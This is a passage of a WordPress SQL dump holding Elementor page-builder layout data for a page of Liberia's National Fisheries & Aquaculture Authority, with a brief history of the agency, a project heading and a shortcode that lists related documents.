Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\",\"_title\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_z_index\":\"\",\"_element_id\":\"\",\"_css_classes\":\"\",\"jet_family_widget_is_order_orientaion\":\"false\",\"jet_family_widget_order_orientaion\":\"\",\"jet_family_widget_order_orientaion_tablet\":\"\",\"jet_family_widget_order_orientaion_mobile\":\"\",\"jet_family_widget_is_flex_basis\":\"false\",\"jet_family_widget_flex_basis\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"jet_family_widget_flex_basis_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"jet_family_widget_flex_basis_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_animation\":\"\",\"_animation_tablet\":\"\",\"_animation_mobile\":\"\",\"animation_duration\":\"\",\"_animation_delay\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b\":\"#f2295b\",\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_type\":\"linear\",\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_gradient_position\":\"center center\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_position_tablet\":\"\",\"_background_position_mobile\":\"\",\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_repeat_tablet\":\"\",\"_background_repeat_mobile\":\"\",\"_background_size\":\"\",\"_background_size_tablet\":\"\",\"_background_size_mobile\":\"\",\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_video_link\":\"\",\"_background_video_start\":\"\",\"_background_video_end\":\"\",\"_background_play_once\":\"\",\"_background_play_on_mobile\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_slideshow_loop\":\"yes\",\"_background_slideshow_slide_duration\":5000,\"_background_slideshow_slide_transition\":\"fade\",\"_background_slideshow_transition_duration\":500,\"_background_slideshow_ken_burns\":\"\",\"_background_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_background\":\"\",\"_background_hover_color\":\"\",\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b\":\"#f2295b\",\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_type\":\"linear\",\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_gradient_position\":\"center center\",\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_position\":\"\",\"_background_hover_position_tablet\":\"\",\"_background_hover_position_mobile\":\"\",\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_attachment\":\"\",\"_background_hover_repeat\":\"\",\"_background_hover_repeat_tablet\":\"\",\"_background_hover_repeat_mobile\":\"\",\"_background_hover_size\":\"\",\"_background_hover_size_tablet\":\"\",\"_background_hover_size_mobile\":\"\",\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_video_link\":\"\",\"_background_hover_video_start\":\"\",\"_background_hover_video_end\":\"\",\"_background_hover_play_once\":\"\",\"_background_hover_play_on_mobile\":\"\",\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[],\"_background_hover_slideshow_loop\":\"yes\",\"_background_hover_slideshow_slide_duration\":5000,\"_background_hover_slideshow_slide_transition\":\"fade\",\"_background_hover_slideshow_transition_duration\":500,\"_background_hover_slideshow_ken_burns\":\"\",\"_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_box_shadow_position\":\" \",\"_border_hover_border\":\"\",\"_border_hover_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_color\":\"\",\"_border_radius_hover\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_hover_box_shadow_type\":\"\",\"_box_shadow_hover_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_hover_box_shadow_position\":\" \",\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_width\":\"\",\"_element_width_tablet\":\"\",\"_element_width_mobile\":\"\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_vertical_align\":\"\",\"_element_vertical_align_tablet\":\"\",\"_element_vertical_align_mobile\":\"\",\"_position\":\"\",\"_offset_orientation_h\":\"start\",\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_orientation_v\":\"start\",\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14205,2267,'_elementor_edit_mode','builder'),(14206,2267,'_elementor_template_type','wp-post'),(14207,2267,'_elementor_version','2.7.5'),(14208,2267,'_wp_page_template','default'),(14209,2267,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\\n\\nThe overall fisheries sector goal is: Sustainably managed and economically viable\\nfisheries that generate prosperity for the present and generations yet unborn.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c9fcce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\",\"_title\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_z_index\":\"\",\"_element_id\":\"\",\"_css_classes\":\"\",\"jet_family_widget_is_order_orientaion\":\"false\",\"jet_family_widget_order_orientaion\":\"\",\"jet_family_widget_order_orientaion_tablet\":\"\",\"jet_family_widget_order_orientaion_mobile\":\"\",\"jet_family_widget_is_flex_basis\":\"false\",\"jet_family_widget_flex_basis\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"jet_family_widget_flex_basis_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"jet_family_widget_flex_basis_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_animation\":\"\",\"_animation_tablet\":\"\",\"_animation_mobile\":\"\",\"animation_duration\":\"\",\"_animation_delay\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b\":\"#f2295b\",\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_type\":\"linear\",\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_gradient_position\":\"center center\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_position_tablet\":\"\",\"_background_position_mobile\":\"\",\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_repeat_tablet\":\"\",\"_background_repeat_mobile\":\"\",\"_background_size\":\"\",\"_background_size_tablet\":\"\",\"_background_size_mobile\":\"\",\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_video_link\":\"\",\"_background_video_start\":\"\",\"_background_video_end\":\"\",\"_background_play_once\":\"\",\"_background_play_on_mobile\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_slideshow_loop\":\"yes\",\"_background_slideshow_slide_duration\":5000,\"_background_slideshow_slide_transition\":\"fade\",\"_background_slideshow_transition_duration\":500,\"_background_slideshow_ken_burns\":\"\",\"_background_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_background\":\"\",\"_background_hover_color\":\"\",\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b\":\"#f2295b\",\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_type\":\"linear\",\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_gradient_position\":\"center center\",\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_position\":\"\",\"_background_hover_position_tablet\":\"\",\"_background_hover_position_mobile\":\"\",\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_attachment\":\"\",\"_background_hover_repeat\":\"\",\"_background_hover_repeat_tablet\":\"\",\"_background_hover_repeat_mobile\":\"\",\"_background_hover_size\":\"\",\"_background_hover_size_tablet\":\"\",\"_background_hover_size_mobile\":\"\",\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_video_link\":\"\",\"_background_hover_video_start\":\"\",\"_background_hover_video_end\":\"\",\"_background_hover_play_once\":\"\",\"_background_hover_play_on_mobile\":\"\",\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[],\"_background_hover_slideshow_loop\":\"yes\",\"_background_hover_slideshow_slide_duration\":5000,\"_background_hover_slideshow_slide_transition\":\"fade\",\"_background_hover_slideshow_transition_duration\":500,\"_background_hover_slideshow_ken_burns\":\"\",\"_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_box_shadow_position\":\" \",\"_border_hover_border\":\"\",\"_border_hover_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_color\":\"\",\"_border_radius_hover\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_hover_box_shadow_type\":\"\",\"_box_shadow_hover_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_hover_box_shadow_position\":\" \",\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_width\":\"\",\"_element_width_tablet\":\"\",\"_element_width_mobile\":\"\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_vertical_align\":\"\",\"_element_vertical_align_tablet\":\"\",\"_element_vertical_align_mobile\":\"\",\"_position\":\"\",\"_offset_orientation_h\":\"start\",\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_orientation_v\":\"start\",\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0e228e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a7761eb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-